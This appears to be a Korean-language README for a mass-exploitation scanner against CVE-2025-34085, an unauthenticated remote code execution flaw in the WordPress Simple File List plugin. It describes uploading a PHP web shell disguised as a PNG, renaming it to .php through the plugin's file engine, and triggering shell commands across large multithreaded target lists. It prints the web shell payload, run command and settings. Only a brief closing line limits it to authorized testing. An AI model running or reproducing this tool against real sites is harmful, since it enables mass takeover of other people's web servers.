다중 대상 비인증 RCE 스캐너, CVE-2025-34085 대상, WordPress Simple File List 플러그인에 영향을 미칩니다. 대규모 대상 집합에 걸쳐 PHP 웹쉘을 업로드, 이름 변경 및 트리거합니다.
CVE-2025-34085 대량 익스플로잇 스캐너 — WordPress Simple File List 플러그인의 인증되지 않은 원격 코드 실행 취약점입니다.
이 도구는 PHP 페이로드를 이미지로 위장하여 업로드하고, 취약한 파일 엔진을 통해 이름을 변경한 후, 사용자 지정 명령으로 셸 실행을 트리거합니다. 대규모 대상 세트에 대한 멀티스레드 스캐닝을 지원합니다.
targets.txt에서)vuln.txt에 기록python3 CVE-2025-34085.py
대상은 targets.txt에 나열되어야 합니다:
example.com
http://target2.com
https://target3.com
필요에 따라 스크립트에서 다음 값을 편집하세요:
COMMAND = "id" # Shell command to execute
EXPECTED_SUBSTRING = "uid=" # String to verify successful command execution
THREADS = 20 # Number of concurrent threads
취약한 ee-upload-engine.php를 통해 <?php system($_GET['cmd']); ?>를 포함하는 가짜 .png 파일을 업로드합니다.
ee-file-engine.php를 사용하여 .php, .phtml 등으로 이름을 변경합니다.
cmd=id로 셸을 트리거하는 GET 요청을 보냅니다.
예상 출력 하위 문자열을 기반으로 성공 여부를 확인합니다.
성공한 적중은 다음에 저장됩니다:
vuln.txt
각 줄에는 취약한 URL, 셸 경로 및 명령 출력이 포함됩니다.
WordPress Simple File List 플러그인 (CVE-2025-34085의 영향을 받는 패치되지 않은 버전)
Apache/Nginx 기본 설정 (쓰기 가능한 wp-content/uploads/)
이 도구는 교육 및 승인된 테스트 전용입니다. 사용에 따른 책임은 본인에게 있습니다. 시스템에 대한 무단 액세스는 불법입니다.